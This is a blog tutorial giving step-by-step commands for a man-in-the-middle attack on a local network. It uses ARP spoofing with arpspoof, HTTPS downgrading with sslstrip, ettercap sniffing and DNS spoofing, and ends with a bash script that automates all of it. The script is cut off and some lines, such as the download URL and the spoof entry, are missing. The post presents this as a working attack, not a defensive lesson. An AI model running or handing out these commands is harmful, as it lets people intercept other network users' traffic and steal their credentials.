Header Ads

SSL sniffing on Ubuntu - SSL Strip/Arpspoof/Ettercap[Linux Tut]

Now I will show you how to sniff SSL traffic on the local network using Arpspoof, ettercap, and SSL strip.

The Install

This will install arpspoof (part of dsniff) and ettercap:

sudo apt-get install ettercap
sudo apt-get install dsniff

Iinstalling sslstrip:

sudo wget Download
tar -zxvf sslstrip-0.7.tar.gz
sudo mv sslstrip-0.7 sslstrip
sudo python setup.py build
sudo rm sslstrip-0.7.tar.gz

Configuring Ettercap

sudo nano /etc/etter.conf

Change the [Privs] section to uid 0

ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

Uncomment the Linux IP tables lines

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Configuring DNS spoofing

sudo nano /usr/share/ettercap/etter.dns

The basic usable syntax is <original IP> A <spoof ip> and wildcards can be used

So to spoof all traffic to google.com you should put this new line at the end of the file:

* A

Sniffing and spoofing
Before any sniffing can be done you need to echo a 1 into proc/sys/net/ipv4/ip_forward

sudo su
echo 1 > /proc/sys/net/ipv4/ip_forward

Now you can sniff:

sudo arpspoof -i <network interface ie wlan0> <gateway/router ip>
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sudo sslstrip -a -k -f

I choose to log my ettercap sessions but this is optional. If you chose to log you must make sure the specified directory exists. Here is the command for a standard sniff

sudo ettercap -T -q -i <network interface> -m "/home/path/to/log/" -P autoadd

Here is the command to dns spoof (remembering first to alter etter.dns to contain the site u wanna spoof to):

sudo ettercap -T -q -i <network interface> -m "home/path/to/log/" -P dns_spoof

I find it a bit cumbersome using these tools in this way, so I wrote a script to do the hard work for me, which I thought I might as well share. Save it and mark it as executable.

echo -e "Please ensure \E[32m\033[1m'echo 1 > /proc/sys/net/ipv4/ip_forward'\E[37m\033[0m has been performed as root"
echo -e "If you plan to spoof change your IP in \E[32m\033[1m'/usr/share/ettercap/etter.dns'\E[37m\033[0m"
now=$(date +"%d-%b-%y")
netlog="$now Ettercap Log.txt"
echo -n "Please enter the router IP:    "
read routerip
echo -n "Please enter interface name (eg: wlan0):    "
read iface
echo -n "Would you like to dns spoof at this time? [y/n]"
read spoof
sudo xterm -geometry 75x15+1+300 -T "ARP Spoof" -e arpspoof -i $iface $routerip &
sleep 2
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
echo "Routed IP Tables"
sudo xterm -geometry 75x15+500+300 -T "SSL Strip" -e sslstrip -a -k -f &
echo "SSL Strip Launched successfully"
sleep 2
if [ "$spoof" = "n" ]; then
sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -m "/home/path/to/log/$netlog" -P autoadd &
sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -m "/home/path/to/log/$netlog" -P dns_spoof &
Powered by Blogger.